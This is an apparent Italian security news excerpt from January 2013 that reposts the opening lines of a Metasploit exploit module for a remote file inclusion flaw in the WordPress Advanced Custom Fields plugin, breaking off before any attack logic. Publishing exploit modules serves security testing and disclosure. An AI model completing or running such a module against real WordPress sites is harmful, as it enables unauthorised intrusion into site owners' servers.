WordPress Advanced Custom Fields Remote File Inclusion

3 gennaio 2013 - Fonte: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
      'Description'    => %q{
          This module exploits a remote file inclusion flaw in the WordPress blogging
        software...

Leggi il seguito »